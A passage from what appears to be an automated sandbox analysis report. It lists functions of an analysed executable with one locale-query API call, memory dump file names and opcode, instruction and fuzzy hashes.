                                                                                                      • Instruction ID: 89f35f917ceb0969605b5b1178b1510aa37cde037a14b9e97fe5e36e85450fe4
                                                                                                      • Opcode Fuzzy Hash: 9dd6c882f793683a887b4c07cfc81b5d37eba2a8b98b79440f054ebebc0dd824
                                                                                                      • Instruction Fuzzy Hash: 65C1E2B1D046689AF7208B24DC84BEA7B75FF90314F0480FAD84D96281E77D5EC5CB66
                                                                                                      Function 00415B05 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 334nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: ac7c5a3a07ead1fc748e1593f9ded529fc2ac0a4cb09b736ddef80e770c063a7
                                                                                                      • Instruction ID: 9efb4b12fdd3a431e315e197c113d1143d7ee9b7eac3132025bd21272447da40
                                                                                                      • Opcode Fuzzy Hash: ac7c5a3a07ead1fc748e1593f9ded529fc2ac0a4cb09b736ddef80e770c063a7
                                                                                                      • Instruction Fuzzy Hash: 1AC1E2B1D046688AF7208B24DC84BEA7B75FF90314F0480FAD84D96281E77D5EC5CB66
                                                                                                      Function 004156D2 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 333COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 272b9818f75538eea7cf6a7d9e17a1c503f3260507c8d0a29869e9a3babb03d6
                                                                                                      • Instruction ID: 5c4585e2668928af4c4a9c5d8b60d67415d992a57c48e112d669b023e930665e
                                                                                                      • Opcode Fuzzy Hash: 272b9818f75538eea7cf6a7d9e17a1c503f3260507c8d0a29869e9a3babb03d6
                                                                                                      • Instruction Fuzzy Hash: ECC116B1C056688EF7208B24DC44BEAB775FF90314F0480FAD84D9A281E73D5ED68B66
                                                                                                      Function 00416139 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 329nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 8242a662e4fcbf3d335c43d79949659fea4ab412c4ccd6aa1b07c0bed7aa3fad
                                                                                                      • Instruction ID: 86cfd49050658043c8ec8f128080ff592c5890b1f6184c572f13b658965a617e
                                                                                                      • Opcode Fuzzy Hash: 8242a662e4fcbf3d335c43d79949659fea4ab412c4ccd6aa1b07c0bed7aa3fad
                                                                                                      • Instruction Fuzzy Hash: CDC1D3B1D052688AF7208B24DC44BEA7775FF50314F0580FAD84D96281E73D5ED68F66
                                                                                                      Function 0041647A Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 328nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 3120dc1c70e0fe10b0f62361a6461ee483340eb4aa70bd46de1c0c0da6a8b99a
                                                                                                      • Instruction ID: b33830fdc2b25b1701c1a62dff443ab5de0825ea8289c22314d48b827659be00
                                                                                                      • Opcode Fuzzy Hash: 3120dc1c70e0fe10b0f62361a6461ee483340eb4aa70bd46de1c0c0da6a8b99a
                                                                                                      • Instruction Fuzzy Hash: 89D1D0B1D052688AE7208B24DC54BEA7BB5FF90314F0480FAD44D96281E73D9ED68F66
                                                                                                      Function 00415F53 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 319nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: f5052b73a46211eb413d7f36af289e153f19183eb5be6ee30e5f612ade1e5ac7
                                                                                                      • Instruction ID: 6fe1b75c0bf1f6abac15371b01104544babdc5c6450a45f7c9d9b67fa0c7ef9c
                                                                                                      • Opcode Fuzzy Hash: f5052b73a46211eb413d7f36af289e153f19183eb5be6ee30e5f612ade1e5ac7
                                                                                                      • Instruction Fuzzy Hash: F5C1E3B1D052688AF7208B24DC44BEAB7B5FF50314F0580FAD84D96281E73D9ED58F66
                                                                                                      Function 00416218 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 293nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: f524765fa0539a2b91d03589f5638adcf8adc07156d275f5ff673447afd9888f
                                                                                                      • Instruction ID: 67be98e06cf19da47e25cf59bdd22624876f70ef5e0007c04783319886dcb7b4
                                                                                                      • Opcode Fuzzy Hash: f524765fa0539a2b91d03589f5638adcf8adc07156d275f5ff673447afd9888f
                                                                                                      • Instruction Fuzzy Hash: C5B1E2B1D052688AF7208B24DC54BEA77B5FF50314F0480FAD84D9A281E73D9ED58F66
                                                                                                      Function 004159EC Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 291nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 4f12374dc199099e85c42e2cb6c1af3580b1877495fd4ebb14622c13f74db03a
                                                                                                      • Instruction ID: c6d80491c7fa15ec72797b74aab722474cab126f624e537e111372369913a8fb
                                                                                                      • Opcode Fuzzy Hash: 4f12374dc199099e85c42e2cb6c1af3580b1877495fd4ebb14622c13f74db03a
                                                                                                      • Instruction Fuzzy Hash: AAB115B1D056688AF7208B24DC54BEA77B5FF90304F0480FAD84D9A281E73D5ED6CB66
                                                                                                      Function 0041622D Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 290nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 3499415b91c0359779f5ad185071e74cba24a49db54c4af67ecc6a14b0f4e033
                                                                                                      • Instruction ID: 86f56ef70b71f6feb7fd00a252532db59141571809674314d4bd6bc7eab99d58
                                                                                                      • Opcode Fuzzy Hash: 3499415b91c0359779f5ad185071e74cba24a49db54c4af67ecc6a14b0f4e033
                                                                                                      • Instruction Fuzzy Hash: 2FB1E1B1D052688AF7208B24DC44BEAB7B5FF50314F0480FAD84D9B281E7399ED58F66
                                                                                                      Function 0041627C Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 281nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 985f253676e0c651f977ef023b38d8bac10b75f8e96e84c61bdc878709b72ec6
                                                                                                      • Instruction ID: dda171624b2e99dd72e528116541c6e45f41ce3ca0d3176eeb380d342dfc46df
                                                                                                      • Opcode Fuzzy Hash: 985f253676e0c651f977ef023b38d8bac10b75f8e96e84c61bdc878709b72ec6
                                                                                                      • Instruction Fuzzy Hash: 40B1E1B1D052688AF7208B24DC54BEAB7B5FF50304F0480FAD84D9A281E73D9ED58F66
                                                                                                      Function 004162D3 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 281nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
